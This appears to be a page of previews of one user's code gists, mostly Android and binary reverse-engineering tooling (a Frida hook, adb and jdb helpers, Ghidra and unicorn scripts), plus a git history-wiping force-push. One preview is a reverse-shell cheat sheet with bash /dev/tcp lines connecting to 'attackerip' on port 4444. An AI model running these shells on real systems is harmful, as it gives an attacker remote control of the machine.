jcalabres

Process.enumerateModules({
  onMatch: function(module){
    console.log('Module name: ' + module.name + " - " + "Base Address: " + module.base.toString());
    if (module.name=="libnative-lib.so"){
      var secret=""
      Interceptor.attach(module.base.add(0x06cf), function() {  
        var x = this.context.eax;
        var y = this.context.ecx;
        var z = x ^ y;
        secret+=String.fromCharCode(z)

jcalabres

git checkout --orphan latest_branch && \
git add -A && \
git commit -am "initial commit" && \
git branch -D master && \
git branch -m master && \
git push -f origin master

jcalabres

/*
 * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved.
 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
 *
 * This code is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License version 2 only, as
 * published by the Free Software Foundation.  Oracle designates this
 * particular file as subject to the "Classpath" exception as provided
 * by Oracle in the LICENSE file that accompanied this code.
 *

jcalabres

from adb.client import Client as AdbClient
from sys import * 
import os 

if __name__=="__main__":
    print("[*] Simple script to automatize LD_PRELOAD process on android applications.")
    if len(argv)!=3:
        print("[-] Specify PACKAGE_NAME  and PATH_LIB.")
        exit(0)
    package=argv[1]

jcalabres

#!/usr/bin/env python

from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
from capstone import *
import sys

#******* Architectures (from unicorn.h) ******************************************************************
# typedef enum uc_arch {

jcalabres

# Download all public gist for a user
# by using v3 gist api (https://developer.github.com/v3/gists/)

import requests, json
from pathlib import Path

headers = {"content-type" : "application/json"}
url = 'https://api.github.com/users/jcalabres/gists'
r = requests.get(url, headers = headers)

jcalabres

; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "{APPNAME}"
#define MyAppVersion "{VERSION}"
#define MyAppPublisher "{PUBLISHER}"
#define MyAppURL "{URL}"

[Setup]
; NOTE: The value of AppId uniquely identifies this application. Do not use the same AppId value in installers for other applications.

jcalabres

nc -nvlp  4444

#Bash

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done  # or:

jcalabres

#by jcalabres
import ghidra.framework.Platform

fileinput=open("/root/ghidra_scripts/functions.txt","r")
fileoutput=open("/root/ghidra_scripts/functions_out.txt","w")
separator = "*"

def printAndWrite(line):
	print(line)
	fileoutput.write(line+"\n")

jcalabres

adb root

function jdwp-attach(){
	adb jdwp
	adb forward tcp:7777 jdwp:$1
	echo "suspend"; cat; } | jdb -attach localhost:7777
}

function get-package(){
	adb shell pm list packages | grep $1 | cut -d ":" -f 2